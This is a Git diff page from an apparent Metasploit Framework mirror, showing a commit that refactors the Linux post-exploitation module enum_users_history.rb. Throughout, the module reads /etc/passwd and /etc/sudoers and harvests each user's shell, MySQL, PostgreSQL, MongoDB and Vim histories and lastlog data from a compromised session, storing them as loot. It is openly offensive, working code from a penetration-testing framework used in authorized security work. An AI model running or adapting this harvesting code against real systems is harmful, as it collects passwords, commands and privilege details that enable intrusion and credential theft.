infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #4481, enum_users_history improvements

bug/bundler_fix
William Vu 2015-01-06 01:52:38 -06:00
parent a69609fe04 745bfb2f35
commit 46aa165ca5
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
1 changed files with 79 additions and 97 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

176
modules/post/linux/gather/enum_users_history.rb
View File

@ -11,50 +11,57 @@ class Metasploit3 < Msf::Post
include Msf::Post::File include Msf::Post::File
include Msf::Post::Linux::System include Msf::Post::Linux::System
def initialize(info = {})
def initialize(info={}) super(update_info(info,
super( update_info( info, 'Name' => 'Linux Gather User History',
'Name' => 'Linux Gather User History', 'Description' => %q{
'Description' => %q{ This module gathers the following user-specific information:
This module gathers user specific information. shell history, MySQL history, PostgreSQL history, MongoDB history,
User list, bash history, mysql history, vim history, Vim history, lastlog, and sudoers.
lastlog and sudoers. },
}, 'License' => MSF_LICENSE,
'License' => MSF_LICENSE, 'Author' =>
'Author' => [
[ # based largely on get_bash_history function by Stephen Haywood
# based largely on get_bash_history function by Stephen Haywood 'ohdae <bindshell[at]live.com>'
'ohdae <bindshell[at]live.com>' ],
], 'Platform' => ['linux'],
'Platform' => ['linux'], 'SessionTypes' => ['shell', 'meterpreter']
'SessionTypes' => ['shell', 'meterpreter'] ))
))
end end
def run def run
distro = get_sysinfo distro = get_sysinfo
print_good("Info:") print_good('Info:')
print_good("\t#{distro[:version]}") print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}") print_good("\t#{distro[:kernel]}")
users = execute("/bin/cat /etc/passwd | cut -d : -f 1") user = execute('/usr/bin/whoami')
user = execute("/usr/bin/whoami") users = execute('/bin/cat /etc/passwd | cut -d : -f 1').chomp.split
users = [user] if user != 'root' || users.blank?
mount = execute("/bin/mount -l") vprint_status("Retrieving history for #{users.length} users")
get_bash_history(users, user) shells = %w{ash bash csh ksh sh tcsh zsh}
get_sql_history(users, user) users.each do |u|
get_vim_history(users, user) home = get_home_dir(u)
last = execute("/usr/bin/last && /usr/bin/lastlog") shells.each do |shell|
sudoers = cat_file("/etc/sudoers") get_shell_history(u, home, shell)
end
get_mysql_history(u, home)
get_psql_history(u, home)
get_mongodb_history(u, home)
get_vim_history(u, home)
end
save("Last logs", last) unless last.nil? last = execute('/usr/bin/last && /usr/bin/lastlog')
save("Sudoers", sudoers) unless sudoers.nil? || sudoers =~ /Permission denied/ sudoers = cat_file('/etc/sudoers')
save('Last logs', last) unless last.blank?
save('Sudoers', sudoers) unless sudoers.blank? || sudoers =~ /Permission denied/
end end
def save(msg, data, ctype="text/plain") def save(msg, data, ctype = 'text/plain')
ltype = "linux.enum.users" ltype = 'linux.enum.users'
loot = store_loot(ltype, ctype, session, data, nil, msg) loot = store_loot(ltype, ctype, session, data, nil, msg)
print_status("#{msg} stored in #{loot.to_s}") print_status("#{msg} stored in #{loot.to_s}")
end end
@ -62,91 +69,66 @@ class Metasploit3 < Msf::Post
def get_host def get_host
case session.type case session.type
when /meterpreter/ when /meterpreter/
host = sysinfo["Computer"] host = sysinfo['Computer']
when /shell/ when /shell/
host = session.shell_command_token("hostname").chomp host = session.shell_command_token('hostname').chomp
end end
print_status("Running module against #{host}") print_status("Running module against #{host}")
host
return host
end end
def execute(cmd) def execute(cmd)
vprint_status("Execute: #{cmd}") vprint_status("Execute: #{cmd}")
output = cmd_exec(cmd) output = cmd_exec(cmd)
return output output
end end
def cat_file(filename) def cat_file(filename)
vprint_status("Download: #{filename}") vprint_status("Download: #{filename}")
output = read_file(filename) output = read_file(filename)
return output output
end end
def get_bash_history(users, user) def get_home_dir(user)
if user == "root" and users != nil home = execute("echo ~#{user}")
users = users.chomp.split() if home.empty?
users.each do |u| if user == 'root'
if u == "root" home = '/root'
vprint_status("Extracting history for #{u}") else
hist = cat_file("/root/.bash_history") home = "/home/#{user}"
else
vprint_status("Extracting history for #{u}")
hist = cat_file("/home/#{u}/.bash_history")
end
save("History for #{u}", hist) unless hist.nil? || hist =~ /No such file or directory/
end end
else
vprint_status("Extracting history for #{user}")
hist = cat_file("/home/#{user}/.bash_history")
vprint_status(hist)
save("History for #{user}", hist) unless hist.nil? || hist =~ /No such file or directory/
end end
home
end end
def get_sql_history(users, user) def get_shell_history(user, home, shell)
if user == "root" and users != nil vprint_status("Extracting #{shell} history for #{user}")
users = users.chomp.split() hist = cat_file("#{home}/.#{shell}_history")
users.each do |u| save("#{shell} history for #{user}", hist) unless hist.blank? || hist =~ /No such file or directory/
if u == "root"
vprint_status("Extracting SQL history for #{u}")
sql_hist = cat_file("/root/.mysql_history")
else
vprint_status("Extracting SQL history for #{u}")
sql_hist = cat_file("/home/#{u}/.mysql_history")
end
save("History for #{u}", sql_hist) unless sql_hist.nil? || sql_hist =~ /No such file or directory/
end
else
vprint_status("Extracting SQL history for #{user}")
sql_hist = cat_file("/home/#{user}/.mysql_history")
vprint_status(sql_hist) if sql_hist
save("SQL History for #{user}", sql_hist) unless sql_hist.nil? || sql_hist =~ /No such file or directory/
end
end end
def get_vim_history(users, user) def get_mysql_history(user, home)
if user == "root" and users != nil vprint_status("Extracting MySQL history for #{user}")
users = users.chomp.split sql_hist = cat_file("#{home}/.mysql_history")
users.each do |u| save("MySQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
if u == "root"
vprint_status("Extracting VIM history for #{u}")
vim_hist = cat_file("/root/.viminfo")
else
vprint_status("Extracting VIM history for #{u}")
vim_hist = cat_file("/home/#{u}/.viminfo")
end
save("VIM History for #{u}", vim_hist) unless vim_hist.nil? || vim_hist =~ /No such file or directory/
end
else
vprint_status("Extracting history for #{user}")
vim_hist = cat_file("/home/#{user}/.viminfo")
vprint_status(vim_hist)
save("VIM History for #{user}", vim_hist) unless vim_hist.nil? || vim_hist =~ /No such file or directory/
end
end end
def get_psql_history(user, home)
vprint_status("Extracting PostgreSQL history for #{user}")
sql_hist = cat_file("#{home}/.psql_history")
save("PostgreSQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end
def get_mongodb_history(user, home)
vprint_status("Extracting MongoDB history for #{user}")
sql_hist = cat_file("#{home}/.dbshell")
save("MongoDB history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end
def get_vim_history(user, home)
vprint_status("Extracting Vim history for #{user}")
vim_hist = cat_file("#{home}/.viminfo")
save("Vim history for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/
end
end end